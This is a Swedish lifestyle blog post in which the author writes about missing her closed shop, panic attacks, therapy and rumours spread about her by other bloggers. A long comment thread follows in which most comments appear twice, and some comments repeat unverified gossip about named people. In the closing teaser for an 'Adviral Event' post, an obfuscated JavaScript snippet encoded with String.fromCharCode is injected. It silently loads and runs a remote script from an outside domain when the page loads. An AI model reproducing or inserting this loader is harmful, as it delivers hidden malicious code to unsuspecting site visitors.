Att släppa taget…. Att förlika sig och gå vidare…..

image

Hej!

 Idag har jag varit helt sänkt. Gjort ingenting. Jag har knappt kommit upp ur soffan. Idag har varit en riktig SKITDAG! Inatt drömde jag om min butik. jag drömde att jag skulle ha personalmöte, med tjejerna. Jag stod i rummet, pratade och gestikulerade men ingen kunde se eller höra mig. Drömmen var SÅ verklig, jag vaknade av mitt egna skrik, av förtvivlan. Jag var genomsvettig…. Det vara bara en dröm, klockan var 03:37. Jag saknar min butik, väldigt mycket. Den var en stor del av ”mig”, min identitet. jag försöker hitta mig själv utan den.

Jag har gråtit som ett barn, rensat mina tankar, blivit så illa tvungen att inse saker som jag blundat för. Saker som gjort för ont för att förstå. Saker jag aldrig förväntade mig skulle hända.

Ibland måste man dessvärre se sig själv i spegeln. Jag mötte min egen blick,  jag bestämde mig för att sluta hänga kvar i ett destruktivt förhållande.

jag bestämde mig för att sluta blunda för det som händer, acceptera det faktum att jag inte kan påverka dom rykten som cirkulerar, dom pikar och falska påståenden som diverse bloggare slänger ut sig till höger och till vänster. Jag väljer ännu en gång att stå över och inte bemöta varken rykten eller inlägg.

90% av ryktena saknar helt substans utan är rena och  skära lögner. Lögner som jag anser att MINA vänner, som känner MIG på riktigt borde synat.

Sett igenom lögnerna som används för att förstöra för mig och samtidigt då ta ”ryktesspridarna”  både ett, två och tre steg framåt i denna ytliga, smutsiga och ganska pinsamma bloggvärld.

Jag hade önskat att man tagit upp detta med mig personligen, som riktiga vänner gör. Som jag själv hade gjort. Jag förlikar mig med att släppa taget om någon/några jag håller av och älskar av hela mitt hjärta. Jag accepterar att mitt hjärta blöder. Jag förbarmar mig själv för att jag släppt någon/några så pass nära, och faktiskt tagit till mig. Det är få människor som kan såra mig på just det sättet, jag nu blivit sårad på.

Jag accepterar läget, får lära mig att leva med det… hitta ett sätt att förlika mig och distansera mig från smärtan. För det ska du veta, att släpa taget om ”dom” som jag just n gör, är bland det värsta jag gjort. Det gör så in i helvetes ont! samma känsla som när jag separerade från min sons pappa. 

Jag tillåter mig att sörja, känns en besvikelse och vara besviken. För jag är besviken, och GRYMT sårad! Jag känner mig ”dömd utan rättegång”.

 Chockad över hur viskleken, och ytliga bloggkollegor lyckats planera frön som blivit värre en ett envist ogräs! chockad över hur man kan tror på när någon säger ”han sa, att hon sa, att han hade hört” osv… 

Att släppa tage behöver inte betyda att det är så för alltid, men det behöver vara så just nu.

Några kloka citat… 

FullSizeRenderTänkvärt…. bättre att inte lägga någon energi överhuvudtaget på det som jag själv inte kan påverka. FullSizeRenderSorgligt men sant… 

FullSizeRender FullSizeRenderimage

När jag är i skolan så distraheras jag, det är väldigt intensivt och fullt fokus behövs. Då skingras mina egna tankar och jag ”pausar”bearbetningen av mina känslor. Jag är lite upp och ner just nu. För två nätter sedan hade jag en riktig panikfångst attack igen. Jag valde att inte skriva om det. jag är lite trött på mitt ”neggiga”jag. MEN, det är en ärlig blogg. Jag är en ärlig person. Ofta är det just sanningen som gör ont. Även i verkliga livet. 

 Varje gång jag får en panikångest attack, så blir jag så ledsen och besviken på mig själv. Jag är så glad över alla dagar där jag skrattar, ler och har börjat fungera igen. Så kommer det där bakslaget igen. MEN, jag fick ett sms av en god vän: ”Två steg fram och ett steg tillbaka är fortfarande ett FRAMSTEG… glöm inte det <3 ”

Jag VET att jag fortfarande är trasig, och har sjukt mycket att jobba på. Jag har levt med ångest till och från hela mitt liv. Jag kan fortfarande inte ta bort det. men jag kan stundvis hantera det något bättre…. Jag går i KBT, jag tar emot hjälp. 

Idag knackade det på dörren, där stod min Växjö-fru Åza. Hon har varit i Sigtuna på utbildning och vi träffades häromdagen. Åza skulle vidare på festligheter. Men kom förbi för att ge mig en kram. DEN kramen är värd mer än tusen falska leenden från folk som finns vid min sida när det passar….  Tack Åza <3image

Ja, detta var väl kanske inte det roligaste ”happy feeling” inlägget som du hittar på blogg-himmeln ikväll. Men detta är inte en feel-good blogg. Detta är MIN lifestyle blogg, där du följer mig, och min vardag. Mitt liv är långt ifrån perfekt. Jag mår inte 100, och det står jag för. Jag försöker inte låtsas vara någon eller någonting som jag inte är.

Jag kämpar. jag står inför stora förändringar och har antagit utmaningen att skapa det liv som jag vill ge både mig själv och min Lilleman. Jag är målmedveten och ska hitta ett sätt att ta mig dit jag vill. Men jag ska laga mig själv, inifrån och ut…..  Och där tog orden slut…..

Kram / My Martens

81 Komentarer

 1. Bry dig inte om elaka människor en riktig vän sätter sig över elaka kommentarer och falska rykten du har ingen att skämmas för så sträck på dig och ta nu nya tag kramisar ?

 2. Du är för bra för dom som svek dig My. Kommer dom krälande för att be om ursäkt nån gång i framtiden så ge dom inte en minut av din tid. Du har Åza , Annelie m. fl nu som är snälla människor. Inga avundsjuka typer som sprider lögner och förtal. Gå vidare nu mamma My, in med det nya och ut med det gamla livet. Kramar till dig duktiga kvinna.

 3. Jag förundras ofta över hur lite folk faktiskt tänker och använder sitt sunt empatiska förnuft. Vuxna människor som jag förmodar lär sina barn att just tänka och visa empati för andra. Men någonstans där på vägen missar de att leva som de lär. Kram på dig! ?
  //Malin

 4. Det är så här en blogg ska vara. Inte en massa osanningar. Din blogg är faktiskt den enda som jag verkligen återkommer till.
  Jag vet precis vad du går igenom vad det gäller ångest.
  Imorgon är det bättre ska du se.
  Kram till dig fina My <3

 5. Väldigt fint foto på dig du är så söt. Du har också det bästa du kan ha LILLEMAN. Allt blir bra igen! Det klart det får ta sin tid. Du är ju en riktig kämpe så pass ung och gått i genom så mycket. Kram

 6. Bry dig inte om elaka människor en riktig vän sätter sig över elaka kommentarer och falska rykten du har ingen att skämmas för så sträck på dig och ta nu nya tag kramisar 😀

 7. Ja My det är ju så som du skriver att han sa och han sa och då byggs det på rykten och detta är fruktansvärt. Men stå på dig och var glad för dom vänner du har i Åsa och Anneli. m flera
  Dom verkar vara riktiga vänner.
  Skit i alla dumma kommentarer. Jag har följt dig sen ensam mamma och förstår att det är svårt att vara officiell person. Men du klarar det med din styrka och envishet. Du ska veta att jag tror på dig, och inte på dumma rykten det är bara svenska avundsjukan som lyser igenom. Många kramar till dig och Lilleman.

 8. Vad är det för rykten? Hänger inte med. Tror det är bra för dig att ha bearbetningsdagar. Så som du beskrev en dag tidigare men sådan superstress och samtidigt bloggande skulle jag varit förvånad om inte ångesten slog till. Man ökar bara ångesten med mer stress. Hänger inte heller med på en annan grej. Du har ju skrivit att du aldrig haft ångest förut. Nu skriver du att du haft det hela ditt liv?!

  • Nej, Eva. jag har skrivit att ”Denna ångest har jag aldrig upplevt tidigare”. Panikångest, är helt ny för mig. Sean har jag haft olika former av ångest sedan jag som 13åring flyttad hemifrån. Separationsångest bla. För att ta ett exempel… Men jag har alltid lärt mg att leva med det och lidi inte av del als under perifer. Men ångsten kommer och går. Nu sedan konkursen på ett annat sätt. Men jag jobbar på det och ser framåt. Jag har skrivit mer utförligt oms et i tidigare inlägg, så du får gärna kika där… Med vänlig hälsning,

 9. <3 Du är klok och du gör rätt i att släppa taget om dessa människor i alla fall just nu för att du ska kunna gå vidare. Vad som sedan händer går inte att sia om. Det finns faktiskt människor som är fruktansvärt duktiga på att manipulera andra så att de inte förstår vad de gör. Du har ju fina vänner som står kvar, dem ska du vara extra rädd om och genom att du nu gör ett eget avslut med de andra så är du den större personen. Och det kanske du får (om du vill så klart) vara igen om de kommer och ber om förlåtelse <3

 10. Du är för bra för dom som svek dig My. Kommer dom krälande för att be om ursäkt nån gång i framtiden så ge dom inte en minut av din tid. Du har Åza , Annelie m. fl nu som är snälla människor. Inga avundsjuka typer som sprider lögner och förtal. Gå vidare nu mamma My, in med det nya och ut med det gamla livet. Kramar till dig duktiga kvinna.

 11. Jag förundras ofta över hur lite folk faktiskt tänker och använder sitt sunt empatiska förnuft. Vuxna människor som jag förmodar lär sina barn att just tänka och visa empati för andra. Men någonstans där på vägen missar de att leva som de lär. Kram på dig! 💙
  //Malin

 12. Det är så här en blogg ska vara. Inte en massa osanningar. Din blogg är faktiskt den enda som jag verkligen återkommer till.
  Jag vet precis vad du går igenom vad det gäller ångest.
  Imorgon är det bättre ska du se.
  Kram till dig fina My <3

 13. Dom gamla ’vännerna’ är inte värda dig. Kom ihåg det ! Försök att se det som – dom har försvunnit ur ditt liv, även om det gör ont o att du är besviken. Att inte våga ta saker ansikte mot ansikte är så fegt !
  Kram ❤️

 14. Väldigt fint foto på dig du är så söt. Du har också det bästa du kan ha LILLEMAN. Allt blir bra igen! Det klart det får ta sin tid. Du är ju en riktig kämpe så pass ung och gått i genom så mycket. Kram

 15. Vad glad att du slipper dem skitstövlarna Som älskar att snacka skit och mer där till. Vissa bloggare har inget bättre för sig men pga det så kanske du vinner deras följare än att dom vinner dina följare. Dem flesta ser vad ni alla skriver om er alla men just du my verkar vara väldigt intressant ämne

 16. Ja My det är ju så som du skriver att han sa och han sa och då byggs det på rykten och detta är fruktansvärt. Men stå på dig och var glad för dom vänner du har i Åsa och Anneli. m flera
  Dom verkar vara riktiga vänner.
  Skit i alla dumma kommentarer. Jag har följt dig sen ensam mamma och förstår att det är svårt att vara officiell person. Men du klarar det med din styrka och envishet. Du ska veta att jag tror på dig, och inte på dumma rykten det är bara svenska avundsjukan som lyser igenom. Många kramar till dig och Lilleman.

 17. Vad är det för rykten? Hänger inte med. Tror det är bra för dig att ha bearbetningsdagar. Så som du beskrev en dag tidigare men sådan superstress och samtidigt bloggande skulle jag varit förvånad om inte ångesten slog till. Man ökar bara ångesten med mer stress. Hänger inte heller med på en annan grej. Du har ju skrivit att du aldrig haft ångest förut. Nu skriver du att du haft det hela ditt liv?!

  • Nej, Eva. jag har skrivit att ”Denna ångest har jag aldrig upplevt tidigare”. Panikångest, är helt ny för mig. Sean har jag haft olika former av ångest sedan jag som 13åring flyttad hemifrån. Separationsångest bla. För att ta ett exempel… Men jag har alltid lärt mg att leva med det och lidi inte av del als under perifer. Men ångsten kommer och går. Nu sedan konkursen på ett annat sätt. Men jag jobbar på det och ser framåt. Jag har skrivit mer utförligt oms et i tidigare inlägg, så du får gärna kika där… Med vänlig hälsning,

 18. <3 Du är klok och du gör rätt i att släppa taget om dessa människor i alla fall just nu för att du ska kunna gå vidare. Vad som sedan händer går inte att sia om. Det finns faktiskt människor som är fruktansvärt duktiga på att manipulera andra så att de inte förstår vad de gör. Du har ju fina vänner som står kvar, dem ska du vara extra rädd om och genom att du nu gör ett eget avslut med de andra så är du den större personen. Och det kanske du får (om du vill så klart) vara igen om de kommer och ber om förlåtelse <3

 19. Dom gamla ’vännerna’ är inte värda dig. Kom ihåg det ! Försök att se det som – dom har försvunnit ur ditt liv, även om det gör ont o att du är besviken. Att inte våga ta saker ansikte mot ansikte är så fegt !
  Kram ❤️

 20. Vill bara skicka en kram till dig My. På sätt och vis känner jag igen mig även om din situation skiljer sig en hel del från min. Jag har förlorat två väldigt nära familjemedlemmar på senare år och med det försvann också vänner successivt. Vänner som inte visade mycket förståelse för att jag sörjde och därmed inte var lika kul att umgås med längre. Idag sörjer jag egentligen inte de personerna (vännerna alltså), för de är enormt självupptagna personer (precis som en del bloggerskor verkar vara), men ibland känns det bara så ensamt. Å andra sidan är vänner något man kan finna nya och det är precis vad jag tänker göra!  Tack och lov verkar du ha några fina vänner kvar vid din sida <3

 21. Vad glad att du slipper dem skitstövlarna Som älskar att snacka skit och mer där till. Vissa bloggare har inget bättre för sig men pga det så kanske du vinner deras följare än att dom vinner dina följare. Dem flesta ser vad ni alla skriver om er alla men just du my verkar vara väldigt intressant ämne

 22. Vill bara skicka en kram till dig My. På sätt och vis känner jag igen mig även om din situation skiljer sig en hel del från min. Jag har förlorat två väldigt nära familjemedlemmar på senare år och med det försvann också vänner successivt. Vänner som inte visade mycket förståelse för att jag sörjde och därmed inte var lika kul att umgås med längre. Idag sörjer jag egentligen inte de personerna (vännerna alltså), för de är enormt självupptagna personer (precis som en del bloggerskor verkar vara), men ibland känns det bara så ensamt. Å andra sidan är vänner något man kan finna nya och det är precis vad jag tänker göra!  Tack och lov verkar du ha några fina vänner kvar vid din sida <3

 23. Bry dig inte om andra människor som skriver elakt om dig! Du duger som du är! Hoppas du kan gå vidare och släppa det gamla, heja heja dig! Tack för din ärliga och öppna blogg. Hoppas din söndag blir en härlig dag:)

 24. Bry dig inte om andra människor som skriver elakt om dig! Du duger som du är! Hoppas du kan gå vidare och släppa det gamla, heja heja dig! Tack för din ärliga och öppna blogg. Hoppas din söndag blir en härlig dag:)

  • Jag undrar också! Är inte inne i så många bloggar och i de jag är inne har jag inte sett något i alla fall. Trist att det ska vara en massa skitsnack! Varför kan man inte respektera varandra. Kram My.

  • Jag undrar också! Är inte inne i så många bloggar och i de jag är inne har jag inte sett något i alla fall. Trist att det ska vara en massa skitsnack! Varför kan man inte respektera varandra. Kram My.

 25. Jag förstår inte vad du pratar om My! Jag har varit inne på flera bloggar och kanske är jag på fel men inte en gång har jag läst något som kan härleda till något skitsnack, något viskande eller någonting. Jag begriper verkligen inte vad du talar om. Vem snackar skit? Om vad ? och varför? Jag antar att du inte kommer svara mig och då känns det som att det bara är DU som håller på, när jag inte kan läsa någonstans att någon skriver illa om dig. Jag kanske är på fel bloggar och naturligtvis ber jag om ursäkt då men det är inte lätt att hänga med när man ingenting vet. Varför inte en gång för alla berätta vad som händer så att vi/jag som är så trög och inte fattar något kan få något att fatta. Vad sägs och vilka är du osams med? Jag begriper inte.
  Ha en bra dag förövrigt. (Ni andra, undanber jag mig skitpåhopp, då jag verkligen på riktigt inte fattar).

  • Jag vill inte kommentera kring detta mer än vad jag gör. Det handlar inte om att vara osams, det handlar om personangrepp, sex-listor och vuxen mobbning. Jag blir glad över att höra att du ”missat detta” och hoppas att majoriteten har gjort just det. Med vänlig hälsning, My

   • My var står det om personangrepp är ditt namn utskrivet på de här bloggarna? Eller vet du att det gäller dig fastän ditt namn inte skrivs?

  • Jag fattar inte heller. Läser en hel del bloggar och har aldrig sett något. Jag vill faktiskt veta annars ser jag ingen substans alks i detta inlägg …..

 26. Fina My!
  Älskar att du är så öppen med hur du känner.
  Rykten är tyvärr en riktig tråkig del av det hela med ”cybervärlden”.
  Har med egna ögon mött fru Toftbys aura inne på en nattklubb här i stan, då vi har gemensamma vänner…
  Vi var pvg. att ansluta till sällskapet och Janne och Johanna står och väntar på att få sina jackor i gaderoben.
  De smågrälar i kön och Janne ber Johanna att tiga, med tanke på att de var ute bland folk.
  Mitt första intryck av Toftbys energi var tyvärr inte inbjudande.
  Kramar
  Amanda

 27. Jag förstår inte vad du pratar om My! Jag har varit inne på flera bloggar och kanske är jag på fel men inte en gång har jag läst något som kan härleda till något skitsnack, något viskande eller någonting. Jag begriper verkligen inte vad du talar om. Vem snackar skit? Om vad ? och varför? Jag antar att du inte kommer svara mig och då känns det som att det bara är DU som håller på, när jag inte kan läsa någonstans att någon skriver illa om dig. Jag kanske är på fel bloggar och naturligtvis ber jag om ursäkt då men det är inte lätt att hänga med när man ingenting vet. Varför inte en gång för alla berätta vad som händer så att vi/jag som är så trög och inte fattar något kan få något att fatta. Vad sägs och vilka är du osams med? Jag begriper inte.
  Ha en bra dag förövrigt. (Ni andra, undanber jag mig skitpåhopp, då jag verkligen på riktigt inte fattar).

  • Jag vill inte kommentera kring detta mer än vad jag gör. Det handlar inte om att vara osams, det handlar om personangrepp, sex-listor och vuxen mobbning. Jag blir glad över att höra att du ”missat detta” och hoppas att majoriteten har gjort just det. Med vänlig hälsning, My

   • My var står det om personangrepp är ditt namn utskrivet på de här bloggarna? Eller vet du att det gäller dig fastän ditt namn inte skrivs?

  • Jag fattar inte heller. Läser en hel del bloggar och har aldrig sett något. Jag vill faktiskt veta annars ser jag ingen substans alks i detta inlägg …..

 28. Fina My!

  Älskar att du är så öppen med hur du känner.

  Rykten är tyvärr en riktig tråkig del av det hela med ”cybervärlden”.
  Har med egna ögon mött fru Toftbys aura inne på en nattklubb här i stan, då vi har gemensamma vänner…

  Vi var pvg. att ansluta till sällskapet och Janne och Johanna står och väntar på att få sina jackor i gaderoben.

  De smågrälar i kön och Janne ber Johanna att tiga, med tanke på att de var ute bland folk.

  Mitt första intryck av Toftbys energi var tyvärr inte inbjudande.

  Kramar
  Amanda

 29. Återigen har bloggarna visat sin avundsjuka gentemot dig genom att sprida lögner, återigen bekräftar dessa bloggare sin sjuka avundsjuka, som jag sagt tidigare, du är för snygg helt enkelt My, och för smart, och en superbra mamma, skit i idioterna.

 30. Återigen har bloggarna visat sin avundsjuka gentemot dig genom att sprida lögner, återigen bekräftar dessa bloggare sin sjuka avundsjuka, som jag sagt tidigare, du är för snygg helt enkelt My, och för smart, och en superbra mamma, skit i idioterna.

 31. De andra bloggerskorna skriver in det mellan raderna i sina texter.
  T ex skriver en om filmen ensam ung kvinna söker…… Då svarar en annan ”vidrigt” osv………
  Men My, har du inga egna vänner som inte härrör till kändisar och bloggar? Måste alla handla på inreda.com och umgås med kändisar? Det blir så pinsamt om du förstår hur jag menar……… Varför publicera Hedman, dr Alban, Fylking od…. De är väl inte dina riktiga vänner?
  Varför växlar du inte ner och bara lever i nuet med djuren och ditt barn? Varför sitter du på flygplatsen flera timmar i förväg? Ibland verkar det som om du har svårt att planera din tid mellan stress och detta.
  Sikta på lagom av allt så ordnar det sig nog.
  Gör bloggen till en träningsblogg och byt portal så slippee sonen figurera och du slipper de andra bloggerskorna här!

  • Hej Malin! Jösses vilken märklig kommentar. Ska försöka svara så tydligt som möjligt på denna. Vad andra driver och inte skriver. Ja, det börjar bli löjligt övertydligt om du frågar mig. MEN, jag väljer att stå över och inte bemöta detta på något sätt. Har jag någonting att säga, tycka eller förmedla så sköter jag det internt. Det är MITT sätt att hantera det på. Hedman? Ja, Magnus är en vän, och en jobb kollega, varför inte publicera? Dr Alban? Ja ännu en vän, vars fru är en av mina närmaste väninnor, som jag träffade för snart fyra år sedan. (????) Fylking. ja, nu vet jag inte om du menar Gert eller Tanja. Oavsett vad så är båda vänner till mig. jag står Tanja betydligt närmare då vi reset en del tillsammans, Thailand, Marbella, runt om i sverige, och för att vi pratar i telen och umgås veckovis…. Jag tycker att du är extremt TRÅNGSYNT, som dömmer ut dessa ,människor för att dom i DINA ögon är ”kändisar”. I våran bransch, dvs media branschen där man figurerar som offentliga profiler i olika sammanhang. Blogg, podd, tv, radio, reklam osv. Då bjuds man in till event där man träffas om och om igen. Vissa är frivilliga att gå på, andra är obligatoriska. Där lär man känna varandra på en naturlig väg. Vad det gäller dom du nämner van tex, Dr Albans fru Kin, och fylking. Det är långt ifrån varje gång vi umgås som vi publicerar det någonstans. VARFÖR tror du att vi skulle göra det? Förklara gärna… Bara för att många av mina vänner sedan 3-4 år jobbar i olika offentliga sammanhang och då i DINA ögon kallas ”kändisar” ska jag säga tack och hej till äkta vänskap pga av att dom gör det? nej, vet du v ad. jag går efter person, kemi och gemenskap. Sen skiter jag fullständigt i vad personen jobbar med! Känd, okänd eller till och med ö-känd. jag skaffar MIN uppfattning =) Varför jag sitter på flygplatsen flera timmar innan. Det var en intressant och lite märklig fråga. Varför lägger du din energi på att fundera så mycket på mig och min vardag? HUR vet du det? Jag pluggar väldigt mycket just nu OCH jobbar med datorn. Här uppe i 08-land så lever vi med ständig rusningstrafik. När min son ska hämtas upp så vill jag som mamma inte riskera att fastna i köerna och inte vara på plats när det är dags. Papper ska dessutom fyllas i och vissa saker ska göras innan som också tidsmässigt ska planeras in. Vad har du med min blogg inriktning att gira? Varför skulle min son inte figurera i min blogg? Det är en lifestyle blogg, min son är en väldigt stor del av mitt liv. Vem är du egentligen? Vad var syftet med din långa kommentar? Berätta gärna….

   • Oj tack för svar! Min kommentar var bl.a. för att svara de som inte hittar att övriga är taskiga mot dig. Jag hade ingen aning om att dessa människor var dina nära vänner. Mitt fel. Sen tänkte jag att det kunde vara skönt att rikta om bloggen och ta bort sonen i och med att han blir äldre, ska börja skolan osv. Jag hade gärna följt din blogg som en ren tränings/receptblogg. Sorry för dåliga tankar!

 32. De andra bloggerskorna skriver in det mellan raderna i sina texter.

  T ex skriver en om filmen ensam ung kvinna söker…… Då svarar en annan ”vidrigt” osv………

  Men My, har du inga egna vänner som inte härrör till kändisar och bloggar? Måste alla handla på inreda.com och umgås med kändisar? Det blir så pinsamt om du förstår hur jag menar……… Varför publicera Hedman, dr Alban, Fylking od…. De är väl inte dina riktiga vänner?

  Varför växlar du inte ner och bara lever i nuet med djuren och ditt barn? Varför sitter du på flygplatsen flera timmar i förväg? Ibland verkar det som om du har svårt att planera din tid mellan stress och detta.

  Sikta på lagom av allt så ordnar det sig nog.

  Gör bloggen till en träningsblogg och byt portal så slippee sonen figurera och du slipper de andra bloggerskorna här!

  • Hej Malin! Jösses vilken märklig kommentar. Ska försöka svara så tydligt som möjligt på denna. Vad andra driver och inte skriver. Ja, det börjar bli löjligt övertydligt om du frågar mig. MEN, jag väljer att stå över och inte bemöta detta på något sätt. Har jag någonting att säga, tycka eller förmedla så sköter jag det internt. Det är MITT sätt att hantera det på. Hedman? Ja, Magnus är en vän, och en jobb kollega, varför inte publicera? Dr Alban? Ja ännu en vän, vars fru är en av mina närmaste väninnor, som jag träffade för snart fyra år sedan. (????) Fylking. ja, nu vet jag inte om du menar Gert eller Tanja. Oavsett vad så är båda vänner till mig. jag står Tanja betydligt närmare då vi reset en del tillsammans, Thailand, Marbella, runt om i sverige, och för att vi pratar i telen och umgås veckovis…. Jag tycker att du är extremt TRÅNGSYNT, som dömmer ut dessa ,människor för att dom i DINA ögon är ”kändisar”. I våran bransch, dvs media branschen där man figurerar som offentliga profiler i olika sammanhang. Blogg, podd, tv, radio, reklam osv. Då bjuds man in till event där man träffas om och om igen. Vissa är frivilliga att gå på, andra är obligatoriska. Där lär man känna varandra på en naturlig väg. Vad det gäller dom du nämner van tex, Dr Albans fru Kin, och fylking. Det är långt ifrån varje gång vi umgås som vi publicerar det någonstans. VARFÖR tror du att vi skulle göra det? Förklara gärna… Bara för att många av mina vänner sedan 3-4 år jobbar i olika offentliga sammanhang och då i DINA ögon kallas ”kändisar” ska jag säga tack och hej till äkta vänskap pga av att dom gör det? nej, vet du v ad. jag går efter person, kemi och gemenskap. Sen skiter jag fullständigt i vad personen jobbar med! Känd, okänd eller till och med ö-känd. jag skaffar MIN uppfattning =) Varför jag sitter på flygplatsen flera timmar innan. Det var en intressant och lite märklig fråga. Varför lägger du din energi på att fundera så mycket på mig och min vardag? HUR vet du det? Jag pluggar väldigt mycket just nu OCH jobbar med datorn. Här uppe i 08-land så lever vi med ständig rusningstrafik. När min son ska hämtas upp så vill jag som mamma inte riskera att fastna i köerna och inte vara på plats när det är dags. Papper ska dessutom fyllas i och vissa saker ska göras innan som också tidsmässigt ska planeras in. Vad har du med min blogg inriktning att gira? Varför skulle min son inte figurera i min blogg? Det är en lifestyle blogg, min son är en väldigt stor del av mitt liv. Vem är du egentligen? Vad var syftet med din långa kommentar? Berätta gärna….

   • Oj tack för svar! Min kommentar var bl.a. för att svara de som inte hittar att övriga är taskiga mot dig. Jag hade ingen aning om att dessa människor var dina nära vänner. Mitt fel. Sen tänkte jag att det kunde vara skönt att rikta om bloggen och ta bort sonen i och med att han blir äldre, ska börja skolan osv. Jag hade gärna följt din blogg som en ren tränings/receptblogg. Sorry för dåliga tankar!

 33. Vad är det för fel på dig My? Varför vågar du inte släppa fram sanningen, att Magdalena Graaf skrev – ensam galning söker -. Sluta släppa fram skit om andra när du inte kan ta sånt som rör dig själv. Varför berättar du inget om din mamma o systrar? Har dom oxå tagit avstånd från dig?.

 34. Vad är det för fel på dig My? Varför vågar du inte släppa fram sanningen, att Magdalena Graaf skrev – ensam galning söker -. Sluta släppa fram skit om andra när du inte kan ta sånt som rör dig själv. Varför berättar du inget om din mamma o systrar? Har dom oxå tagit avstånd från dig?.

 35. Det du gör nu är att sprida en sorts skvaller eftersom du vet ju att alla fattar vem/vilka det är varför är det mer annorlunda än det de andra syftar på dont get it, ..jag dömmer i gen men det brukar inte vara rök utan eld men jag tror att det kommer fram så småningom MEN jag har inte läst nått dumt om just dig på någon blogg MEN det ligger en skvallertråd på fb som hintar om vad som skett och att det snart kommer ut så alla förstår och nått om hämnden är ljuv…som sagt tar igen sida men en part måste ju ljuga men vem? Den som hela tiden skriver på sin blogg om alla dumma gamla vänner som svikit pga av falska rykten eller den/de som hintar att något hemskt hänt som gjort att alla vänder ryggen…som sagt spännande värre för oss läsare nu hoppas jag att allt löser sig får bådas parter..

  • Nu kanske du har missat det sista som skrivits om mig, vilket är fullt naturligt. jag ber inte att någons ska ta parti eller att någon ska få skulden. Jag vet vad jag har gjort, jag står för vem jag är. DET räcker för mig. Sanningen kommer som sagt ALLTID fram, den dagen den gör det så är ingen gladare än jag ?

 36. Det du gör nu är att sprida en sorts skvaller eftersom du vet ju att alla fattar vem/vilka det är varför är det mer annorlunda än det de andra syftar på dont get it, ..jag dömmer i gen men det brukar inte vara rök utan eld men jag tror att det kommer fram så småningom MEN jag har inte läst nått dumt om just dig på någon blogg MEN det ligger en skvallertråd på fb som hintar om vad som skett och att det snart kommer ut så alla förstår och nått om hämnden är ljuv…som sagt tar igen sida men en part måste ju ljuga men vem? Den som hela tiden skriver på sin blogg om alla dumma gamla vänner som svikit pga av falska rykten eller den/de som hintar att något hemskt hänt som gjort att alla vänder ryggen…som sagt spännande värre för oss läsare nu hoppas jag att allt löser sig får bådas parter..

  • Nu kanske du har missat det sista som skrivits om mig, vilket är fullt naturligt. jag ber inte att någons ska ta parti eller att någon ska få skulden. Jag vet vad jag har gjort, jag står för vem jag är. DET räcker för mig. Sanningen kommer som sagt ALLTID fram, den dagen den gör det så är ingen gladare än jag 😉

 37. Följt en bloggmamma med massa barn fram tills idag, men nu är det slut, ska aldrig mer gå in på hennes sida mer. Sättet hon hängde ut dig, skrev att du tagit på offerkofta och förlöjligat hennes usla beteende med att inte fatta att hon ÄR en vuxenmobbare sånt vill jag inte stödja. All kärlek och respekt till dig My. Låt inte fega typer trycka ner dig, det är du alldeles för stark för. All styrka till dig!?

 38. Följt en bloggmamma med massa barn fram tills idag, men nu är det slut, ska aldrig mer gå in på hennes sida mer. Sättet hon hängde ut dig, skrev att du tagit på offerkofta och förlöjligat hennes usla beteende med att inte fatta att hon ÄR en vuxenmobbare sånt vill jag inte stödja. All kärlek och respekt till dig My. Låt inte fega typer trycka ner dig, det är du alldeles för stark för. All styrka till dig!😘

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/